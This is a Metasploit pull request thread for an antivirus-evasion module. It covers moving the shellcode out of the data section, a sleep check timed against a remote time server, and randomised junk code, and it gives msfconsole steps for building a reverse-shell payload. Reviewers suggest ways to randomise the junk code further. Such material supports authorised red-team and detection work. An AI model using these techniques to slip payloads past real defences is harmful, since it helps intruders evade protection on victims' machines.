### PR TITLE
Evasion module - no_shellcode/Time obfuscation

### PR DESCRIPTION
**Pull request by araout42**
This is a new evasion module, with 2 technique in it , 

No_shellcode : There is no shellcode declared in the file, so  no big data array in the .data section
Time obfuscation : The well known technique with a sleep, to check if the sleep is not simulated by the AV product
except that we check for the time from a distant server (worldtimeapi), so no AV will trick us with fake system clock

it also include some random code junk such as fibonnacci calucation, euclidian calculation, or binary search, or random array sorting 

windows defender should not block the payload and should not detect it, but when launched and the shell connected in the metasploit listener it then get detected by network traffic or in-memory anlysis 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use evasion/windows/time_obfuscation_no_shellcode`
- [ ]  `set payload windows/shell/reverse_tcp`
- [ ] `set lhost ... ... `
- [ ] exploit
- [ ] setup handler
- [ ] execute the payload on a windows machine on the network
- [ ] generate the same payload without evasion module using msfvenom
- [ ] check its av detection rate on VirusTotal

##VT demo

-> evasion module https://www.virustotal.com/gui/file/24e9fd7219ea3a611947daa93efa95248f2deb15a2e33b8209ea375439c5b366
->regular payload  windows/meterpreter/reverse_tcp with msfvenom 
https://www.virustotal.com/gui/file/651f07a81c44b38231d6708aa138239e865f8e9f336648b781ad4b8d13f9e92b?nocache=1

### CODE REVIEW

File: modules/evasion/windows/time_obfuscation_no_shellcode.rb [hunk 1]
```diff
@@ -0,0 +1,323 @@
...
+  def junk_code(flag)
+    # fibonnacci fucntion
+    fibonnacci = %|
+  int fib(int n) {
+    if (n <= 1)
+      return n;
+    return fib(n-1) + fib(n-2);
+  }
+  |
+    bubbel_sort = %|
```
Comment (adfoster-r7) [inline modules/evasion/windows/time_obfuscation_no_shellcode.rb:92]: I think this might be `bubble` sort 👀

Comment (araout42) [reply modules/evasion/windows/time_obfuscation_no_shellcode.rb:92]: Yes! It is 😅 Will correct that

File: modules/evasion/windows/time_obfuscation_no_shellcode.rb [hunk 2]
```diff
@@ -0,0 +1,323 @@
...
+      return [fibonnacci_call, bubbel_sort_call, euclide_call, binary_search_call].sample
+    end
+  end
+
+  def get_includes
+    rc4 = "#include \"#{File.join(Msf::Config.install_root, 'data', 'headers', 'windows')}/rc4.h\""
+    includes = ["#include <windows.h>\n", "#include <psapi.h>\n", "#include <wininet.h>\n", "#include <synchapi.h>\n", "#include <stdio.h>\n", rc4, "#include <time.h>\n", "#include <stdlib.h>\n", "#include <string.h>\n", '#include <winsock2.h>']
+    includes.shuffle
+    return includes.join
+  end
```
Comment (bcoles) [inline modules/evasion/windows/time_obfuscation_no_shellcode.rb:160]:
```suggestion
  def get_includes
    [
      "#include \"#{File.join(Msf::Config.install_root, 'data', 'headers', 'windows')}/rc4.h\"",
      '#include <windows.h>',
      '#include <psapi.h>',
      '#include <wininet.h>',
      '#include <synchapi.h>',
      '#include <stdio.h>',
      '#include <time.h>',
      '#include <stdlib.h>',
      '#include <string.h>',
      '#include <winsock2.h>'
    ].shuffle.join("\n")
  end
```

**Comment by jvoisin** [comment]
I think it would be better to extract the "junk" functions into a function each, like done in [modules/evasion/windows/syscall_inject.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb), and sprinkle them randomly into the c code, instead of hardcoding `junk(1)` everywhere.

**Comment by sempervictus** [comment]
Neat, thanks. Seems to target x86 specifically using the mingw stack, wondering if there's any benefit to inclusion of a staging hook for when the time check succeeds either in c or via stager embedding and allow 64b native target.

**Comment by araout42** [comment]
> I think it would be better to extract the "junk" functions into a function each, like done in [modules/evasion/windows/syscall_inject.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb), and sprinkle them randomly into the c code, instead of hardcoding `junk(1)` everywhere.

Hello,  thanks for your comments,
the junk(1) call a function that will return a `randomised C function call string`
i could not find in[syscall_inject]( https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb) where is the code i should use 
could you show me wich lines or maybe copy here a portion of code i could insipre from?

**Comment by araout42** [comment]
> Neat, thanks. Seems to target x86 specifically using the mingw stack, wondering if there's any benefit to inclusion of a staging hook for when the time check succeeds either in c or via stager embedding and allow 64b native target.



> when the time check succeeds

Hey sempervictus, thanks for your comment, i'm sure this would work on 64b machines
i quite dont understand what do you mean by  staging hook can you be more specific :) ?

thanks

**Comment by jvoisin** [comment]
> > I think it would be better to extract the "junk" functions into a function each, like done in [modules/evasion/windows/syscall_inject.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb), and sprinkle them randomly into the c code, instead of hardcoding `junk(1)` everywhere.
> 
> Hello, thanks for your comments, the junk(1) call a function that will return a `randomised C function call string` i could not find in[syscall_inject](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb) where is the code i should use could you show me wich lines or maybe copy here a portion of code i could insipre from?

eg. [here](https://github.com/rapid7/metasploit-framework/pull/18804/files#diff-71ee770fb33e717c37736827bb0b5e39e5c81cc0311d806c3bee12f625183b18R292-R313).

You could do something like this:

```ruby
# Insert a random amount of `junk` on random new lines in `payload`
payload_arr = payload.split("\n")
rand(12..24).times do
  payload_arr.insert(rand(0..payload_arr.size), '#{junk_code(1)}')
end
payload = payload_arr.join("\n")
```

**Comment by araout42** [comment]
> > > I think it would be better to extract the "junk" functions into a function each, like done in [modules/evasion/windows/syscall_inject.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb), and sprinkle them randomly into the c code, instead of hardcoding `junk(1)` everywhere.
> > 
> > Hello, thanks for your comments, the junk(1) call a function that will return a `randomised C function call string` i could not find in[syscall_inject](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb) where is the code i should use could you show me wich lines or maybe copy here a portion of code i could insipre from?
> 
> eg. [here](https://github.com/rapid7/metasploit-framework/pull/18804/files#diff-71ee770fb33e717c37736827bb0b5e39e5c81cc0311d806c3bee12f625183b18R292-R313).
> 
> You could do something like this:
> 
> ```ruby
> # Insert a random amount of `junk` on random new lines in `payload`
> payload_arr = payload.split("\n")
> rand(12..24).times do
>   payload_arr.insert(rand(0..payload_arr.size), '#{junk_code(1)}')
> end
> payload = payload_arr.join("\n")
> ```

Thanks, i will put this in the code tomorrow

**Comment by sempervictus** [comment]
> > Neat, thanks. Seems to target x86 specifically using the mingw stack, wondering if there's any benefit to inclusion of a staging hook for when the time check succeeds either in c or via stager embedding and allow 64b native target.
> 
> > when the time check succeeds
> 
> Hey sempervictus, thanks for your comment, i'm sure this would work on 64b machines i quite dont understand what do you mean by staging hook can you be more specific :) ?
> 
> thanks

This will work on 64b in either target case, most run 32b programs just fine - its how they're run and the heuristic fingerprints of "it" in the target which concern me a bit.

Since the evasion is making outbound http calls already, it has most of the api needed to pull an http stager/handoff to a session should the check pass

**Comment by sempervictus** [comment]
> > > > I think it would be better to extract the "junk" functions into a function each, like done in [modules/evasion/windows/syscall_inject.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb), and sprinkle them randomly into the c code, instead of hardcoding `junk(1)` everywhere.
> > > 
> > > 
> > > Hello, thanks for your comments, the junk(1) call a function that will return a `randomised C function call string` i could not find in[syscall_inject](https://github.com/rapid7/metasploit-framework/blob/master/modules/evasion/windows/syscall_inject.rb) where is the code i should use could you show me wich lines or maybe copy here a portion of code i could insipre from?
> > 
> > 
> > eg. [here](https://github.com/rapid7/metasploit-framework/pull/18804/files#diff-71ee770fb33e717c37736827bb0b5e39e5c81cc0311d806c3bee12f625183b18R292-R313).
> > You could do something like this:
> > ```ruby
> > # Insert a random amount of `junk` on random new lines in `payload`
> > payload_arr = payload.split("\n")
> > rand(12..24).times do
> >   payload_arr.insert(rand(0..payload_arr.size), '#{junk_code(1)}')
> > end
> > payload = payload_arr.join("\n")
> > ```
> 
> well, that will be way more complex than that, must be careful about, the function brackets, if else brackets, do not add junk_code outside function,do not add it in self function an so on
> 
> what you're suggesting kinda implies a C parser...

Metasm has a basic c parser, might be of use

**Comment by jvoisin** [comment]
Randomly replace `;` with `;junk(1);` :D

**Comment by araout42** [comment]
i've deleted the `#{junk(1)}`

and added support for `x86_32` and `x86_64` mingw_compiler,  by parsing the` payload.inspect @pinst` value not sure if it's best way to do it, but only one i found myself

will do the `; to ;junk(1); later on `

**Comment by smcintyre-r7** [comment]
Is this ready for testing and a formal review? It's still marked as a draft but I see there's been some comments on it.

**Comment by araout42** [comment]
Hello, it's not ready yet. I Stiller need to imolement jvoisin's advice on randomizing the junk properly.

Would also need a proper way to check for x86 or x64 i'm sure there is à better way than the @pinst parsing 

On top of that i would like to embbed another evasion technique I have in mind in it

**Comment by smcintyre-r7** [comment]
That's okay, I'm going to go ahead and attic this then until you have time to make the changes. Once you're ready, just tag be in this PR and I'll happy to reopen it. Thanks!

**Pull request closed without merging**